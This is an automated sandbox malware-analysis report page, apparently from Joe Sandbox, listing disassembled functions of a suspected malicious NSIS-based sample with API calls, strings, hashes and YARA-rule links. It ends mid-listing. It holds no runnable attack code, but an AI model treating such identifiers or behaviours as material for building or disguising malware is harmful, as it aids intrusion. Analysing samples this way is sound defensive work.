                                              • Instruction ID: 400e5e0b203cfa4d99e013a63ed7a258bcbaee981441f5d34274aa4bdee23deb
                                              • Opcode Fuzzy Hash: 2942623f6c0277285390027b9d18840a489366ce0a7cc68cdc812ca0f05454fe
                                              • Instruction Fuzzy Hash: 6AE065716042109BE710E778AD89AAF226CDF41328B100677E116F50D1E67889819B1D
                                              Function 00406E34 Relevance: .3, Instructions: 348COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3db9e2985b9a95f07b4948d92816868b6eb93f1de1133e87cfb4c0131ea940ae
                                              • Instruction ID: 195f9c0d2d2971c704648993b79f5dd0ea752a0e03b98457dcbfca0f5118a9d4
                                              • Opcode Fuzzy Hash: 3db9e2985b9a95f07b4948d92816868b6eb93f1de1133e87cfb4c0131ea940ae
                                              • Instruction Fuzzy Hash: D2E16D71D04214DFCF18CF58D880AADB7F1AF45305F1981ABE856AF286D738AA50CF55
                                              Function 0040680A Relevance: .3, Instructions: 305COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 06c75ba6eb7b1da5beda44bb12a349235cc55abe98431d1e410fa8ae9787adfe
                                              • Instruction ID: 00c1500383e690738851ed547f8828f465c8dec40552374253bbad03b7333b94
                                              • Opcode Fuzzy Hash: 06c75ba6eb7b1da5beda44bb12a349235cc55abe98431d1e410fa8ae9787adfe
                                              • Instruction Fuzzy Hash: 59C15C72A012698FCF18DF68C9805ED7BA2FF89314B16812AEC56A7384D734EC55CF84
                                              Function 00404F45 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404F81
                                              • ShowWindow.USER32(?), ref: 00404F9E
                                              • DestroyWindow.USER32 ref: 00404FB2
                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404FCE
                                              • GetDlgItem.USER32(?,?), ref: 00404FEF
                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405003
                                              • IsWindowEnabled.USER32(00000000), ref: 0040500A
                                              • GetDlgItem.USER32(?,00000001), ref: 004050B9
                                              • GetDlgItem.USER32(?,00000002), ref: 004050C3
                                              • SetClassLongW.USER32(?,000000F2,?), ref: 004050DD
                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040512E
                                              • GetDlgItem.USER32(?,00000003), ref: 004051D4
                                              • ShowWindow.USER32(00000000,?), ref: 004051F6
                                              • EnableWindow.USER32(?,?), ref: 00405208
                                              • EnableWindow.USER32(?,?), ref: 00405223
                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405239
                                              • EnableMenuItem.USER32(00000000), ref: 00405240
                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00405258
                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040526B
                                              • lstrlenW.KERNEL32(0044FD98,?,0044FD98,004732A0), ref: 00405294
                                              • SetWindowTextW.USER32(?,0044FD98), ref: 004052A8
                                              • ShowWindow.USER32(?,0000000A), ref: 004053DC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                              • String ID:
                                              • API String ID: 184305955-0
                                              • Opcode ID: 7aaa3711757a90e2e8d2d5b12379ccc9e45fddc9e642e06a127254d179e313fb
                                              • Instruction ID: 48c820c9c586f8d8a765c04f05b8e06de5329faa08805170889eeb6d15e0b63f
                                              • Opcode Fuzzy Hash: 7aaa3711757a90e2e8d2d5b12379ccc9e45fddc9e642e06a127254d179e313fb
                                              • Instruction Fuzzy Hash: 1DC19F71500A04EBDB206F61EE89E2B3AA8FB45746F00053EF645B11F1CB799881EF5E
                                              Function 00403C1F Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 212windowstringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00403CD3
                                              • GetDlgItem.USER32(?,000003E8), ref: 00403CE7
                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00403D04
                                              • GetSysColor.USER32(?), ref: 00403D15
                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00403D23
                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00403D31
                                              • lstrlenW.KERNEL32(?), ref: 00403D3C
                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00403D49
                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00403D58
                                                • Part of subcall function 00403B31: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00403C8A,?), ref: 00403B48
                                                • Part of subcall function 00403B31: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00403C8A,?), ref: 00403B57
                                                • Part of subcall function 00403B31: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00403C8A,?), ref: 00403B6B
                                              • GetDlgItem.USER32(?,0000040A), ref: 00403DB2
                                              • SendMessageW.USER32(00000000), ref: 00403DB9
                                              • GetDlgItem.USER32(?,000003E8), ref: 00403DE4
                                              • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 00403E27
                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00403E35
                                              • SetCursor.USER32(00000000), ref: 00403E38
                                              • ShellExecuteW.SHELL32(0000070B,open,0046B220,00000000,00000000,00000001), ref: 00403E4D
                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00403E59
                                              • SetCursor.USER32(00000000), ref: 00403E5C
                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 00403E8B
                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00403E9D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                              • String ID: %AtlasTreasures%$N$open
                                              • API String ID: 3928313111-2198007348
                                              • Opcode ID: eeec9a5106f0c5fb6c06cb270565f78b24ee1f1d5bc0a3e508a16aae0c4c8822
                                              • Instruction ID: ed57efd37533f930562fe34da2b72c8113efd27b5b8a5cb1164b605c320215f3
                                              • Opcode Fuzzy Hash: eeec9a5106f0c5fb6c06cb270565f78b24ee1f1d5bc0a3e508a16aae0c4c8822
                                              • Instruction Fuzzy Hash: A87181B1900609BFDB109F24DD89A6A7F7CFB04306F00813AF605B62E1C7789A51CF99
                                              Function 0040635B Relevance: 36.9, APIs: 15, Strings: 6, Instructions: 163filestringmemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrcpyW.KERNEL32(00463E20,NUL), ref: 0040636B
                                              • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,?,?,?,0040654E,00000000,00000000,00000001,00406721,?,00000000), ref: 0040638A
                                              • GetShortPathNameW.KERNEL32(00000000,00463E20,00000400), ref: 00406393
                                                • Part of subcall function 00405864: lstrlenA.KERNEL32(00406495,?,00000000,00000000,?,00000000,00406495,00000000,[Rename]), ref: 00405874
                                                • Part of subcall function 00405864: lstrlenA.KERNEL32(00000000,?,00000000,00406495,00000000,[Rename]), ref: 004058A6
                                              • GetShortPathNameW.KERNEL32(Ne@,00469478,00000400), ref: 004063B4
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00463E20,000000FF,00464620,00000400,00000000,00000000,?,00000000,?,?,?,0040654E,00000000,00000000), ref: 004063DD
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00469478,000000FF,00464C70,00000400,00000000,00000000,?,00000000,?,?,?,0040654E,00000000,00000000), ref: 004063F5
                                              • wsprintfA.USER32 ref: 0040640F
                                              • GetFileSize.KERNEL32(00000000,00000000,00469478,C0000000,00000004,00469478,?), ref: 00406447
                                              • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406456
                                              • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406472
                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 004064A2
                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00465070,00000000,-0000000A,004089A0,00000000,[Rename]), ref: 004064F5
                                                • Part of subcall function 004058FE: GetFileAttributesW.KERNELBASE(00000003,0040315B,004E80D8,80000000,00000003,?,?,?,00000000,004035D7,?), ref: 00405902
                                                • Part of subcall function 004058FE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,004035D7,?), ref: 00405924
                                              • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406509
                                              • GlobalFree.KERNEL32(00000000), ref: 00406510
                                              • CloseHandle.KERNEL32(?), ref: 0040651A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                              • String ID: >F$%s=%s$NUL$Ne@$[Rename]$pLF
                                              • API String ID: 565278875-2487742289
                                              • Opcode ID: b4dbeba100c443a2c99ce08ec389315a9b0dbc3ce33a9389b5f019bb092845f7
                                              • Instruction ID: ec96de5c0a89ca25b54bc76a1f58c05e631165e395b03bcecce623a0c26120a0
                                              • Opcode Fuzzy Hash: b4dbeba100c443a2c99ce08ec389315a9b0dbc3ce33a9389b5f019bb092845f7
                                              • Instruction Fuzzy Hash: C2412A32105209BFC6202B61EE48E2F3E5CDF86758B16453EF546F22D1DE3D98158ABE
                                              Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                              Download Yara Rule
                                              APIs
                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                              • BeginPaint.USER32(?,?), ref: 00401047
                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                              • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                              • DeleteObject.GDI32(?), ref: 004010F6
                                              • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                              • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                              • SelectObject.GDI32(00000000,?), ref: 00401149
                                              • DrawTextW.USER32(00000000,004732A0,000000FF,00000010,00000820), ref: 0040115F
                                              • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                              • DeleteObject.GDI32(?), ref: 0040116E
                                              • EndPaint.USER32(?,?), ref: 00401177
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                              • String ID: F
                                              • API String ID: 941294808-1304234792
                                              • Opcode ID: 6ff7da4ded68621eb9ecef41b220d021edcb146cdc93fa7e0b1181698ae2407c
                                              • Instruction ID: 5d70bd818855421fa823bf0ed1b165e0401977292747d9ede3c4f118d7b178ba
                                              • Opcode Fuzzy Hash: 6ff7da4ded68621eb9ecef41b220d021edcb146cdc93fa7e0b1181698ae2407c
                                              • Instruction Fuzzy Hash: BB515A71400209AFCF058F95DE459AF7FB9EF44311F04802AF992AA1A0CB38DA55DFA4
                                              Function 004060CA Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 218stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetVersion.KERNEL32(00447D88,?,00000000,00404AAA,00447D88,00000000,00424D76,74DF23A0,00000000), ref: 0040619B
                                              • GetSystemDirectoryW.KERNEL32(%AtlasTreasures%,00002004), ref: 0040621D
                                                • Part of subcall function 00405AB8: lstrcpynW.KERNEL32(?,?,00002004,00403483,004732A0,NSIS Error), ref: 00405AC5
                                                • Part of subcall function 004060CA: SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040626C
                                                • Part of subcall function 004060CA: SHGetPathFromIDListW.SHELL32(?,%AtlasTreasures%), ref: 0040627A
                                                • Part of subcall function 004060CA: CoTaskMemFree.OLE32(?), ref: 00406285
                                              • GetWindowsDirectoryW.KERNEL32(%AtlasTreasures%,00002004), ref: 00406230
                                              • lstrcatW.KERNEL32(%AtlasTreasures%,\Microsoft\Internet Explorer\Quick Launch), ref: 004062AA
                                              • lstrlenW.KERNEL32(%AtlasTreasures%,00447D88,?,00000000,00404AAA,00447D88,00000000,00424D76,74DF23A0,00000000), ref: 0040630C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrcpynlstrlen
                                              • String ID: %AtlasTreasures%$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                              • API String ID: 3935908587-642398599
                                              • Opcode ID: d404f1267a91f84120ed82a5726344723f4104790e5192d29b3fdddb81e5045c
                                              • Instruction ID: faf527bbbd80b2f6d96589bc921f5814a8c68153425bf04786751db3c9b8505d
                                              • Opcode Fuzzy Hash: d404f1267a91f84120ed82a5726344723f4104790e5192d29b3fdddb81e5045c
                                              • Instruction Fuzzy Hash: A2711531900215AADF20AF68CC4467E33B4EB55314F12817FE947BA2E1D73D89A2CB9D
                                              Function 00403952 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetWindowLongW.USER32(?,000000EB), ref: 0040396C
                                              • GetSysColor.USER32(00000000), ref: 00403988
                                              • SetTextColor.GDI32(?,00000000), ref: 00403994
                                              • SetBkMode.GDI32(?,?), ref: 004039A0
                                              • GetSysColor.USER32(?), ref: 004039B3
                                              • SetBkColor.GDI32(?,?), ref: 004039C3
                                              • DeleteObject.GDI32(?), ref: 004039DD
                                              • CreateBrushIndirect.GDI32(?), ref: 004039E7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                              • String ID:
                                              • API String ID: 2320649405-0
                                              • Opcode ID: 6e8c2a3615f2505a185ac55974dadb6ac4ac18c0c35a8d3832bbfc0dda71d657
                                              • Instruction ID: fd505c26376d0b004dab163c32b6598f7c3f39bfa23b8c101552dd0b32be6230
                                              • Opcode Fuzzy Hash: 6e8c2a3615f2505a185ac55974dadb6ac4ac18c0c35a8d3832bbfc0dda71d657
                                              • Instruction Fuzzy Hash: 931166B15007446BC7219F68DE08B5BBFFCAF05715F05892DF886E22A0D774DA48CB54
                                              Function 00402A2F Relevance: 10.6, APIs: 7, Instructions: 91memoryfileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402A83
                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?,00000000), ref: 00402AA0
                                              • GlobalFree.KERNEL32(?), ref: 00402AD7
                                              • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00402AEB
                                              • GlobalFree.KERNEL32(00000000), ref: 00402AF2
                                              • CloseHandle.KERNEL32(?), ref: 00402B09
                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402B1C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                              • String ID:
                                              • API String ID: 3294113728-0
                                              • Opcode ID: 2a415ac0b65e7ed1e85d085157a57941f96e69fc1561960092c6122626d45b92
                                              • Instruction ID: 9e4a56611826f2756eb4244239c06745681650eb98283bcdfa384ecb69a0f049
                                              • Opcode Fuzzy Hash: 2a415ac0b65e7ed1e85d085157a57941f96e69fc1561960092c6122626d45b92
                                              • Instruction Fuzzy Hash: 13219832D00114BBCB216FA5DE49E9F7F79DF49724F10423AF925761E1CB7848119BA8
                                              Function 00404A73 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrlenW.KERNEL32(00447D88,00424D76,74DF23A0,00000000), ref: 00404AAB
                                              • lstrlenW.KERNEL32(0040304D,00447D88,00424D76,74DF23A0,00000000), ref: 00404ABB
                                              • lstrcatW.KERNEL32(00447D88,0040304D), ref: 00404ACE
                                              • SetWindowTextW.USER32(00447D88,00447D88), ref: 00404AE0
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00404B06
                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00404B20
                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 00404B2E
                                                • Part of subcall function 004060CA: GetVersion.KERNEL32(00447D88,?,00000000,00404AAA,00447D88,00000000,00424D76,74DF23A0,00000000), ref: 0040619B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                              • String ID:
                                              • API String ID: 2740478559-0
                                              • Opcode ID: 141fa25f867edaa8b9051ab2f09e4248f19e9da238f05a8cd45e618e6a3e53c0
                                              • Instruction ID: 484fc1ca55a69b1daf8ef76b765ed66def062ae06368be70f68da4f473989c37
                                              • Opcode Fuzzy Hash: 141fa25f867edaa8b9051ab2f09e4248f19e9da238f05a8cd45e618e6a3e53c0
                                              • Instruction Fuzzy Hash: A221B3B1900518BADF119F65DC84E9EBFB9FF84314F10413AFA04B22A0C7788A80DF58
                                              Function 0040434F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0040436A
                                              • GetMessagePos.USER32 ref: 00404372
                                              • ScreenToClient.USER32(?,?), ref: 0040438A
                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040439C
                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004043C2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: Message$Send$ClientScreen
                                              • String ID: f
                                              • API String ID: 41195575-1993550816
                                              • Opcode ID: 0fd0a508c23a1f4cc7d109850199a12f342c67c69df64cb0c481c89d05409d64
                                              • Instruction ID: 785f0416c38af9d8ad27fcbae1db7caa358ffe27c450e4d5cf04d3572e5fe4cd
                                              • Opcode Fuzzy Hash: 0fd0a508c23a1f4cc7d109850199a12f342c67c69df64cb0c481c89d05409d64
                                              • Instruction Fuzzy Hash: B0017171A4021DBAEB00DBA4DD85FEEBBBCAF55714F10012BFB50B61D0C7B49A418B65
                                              Function 00402DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD2
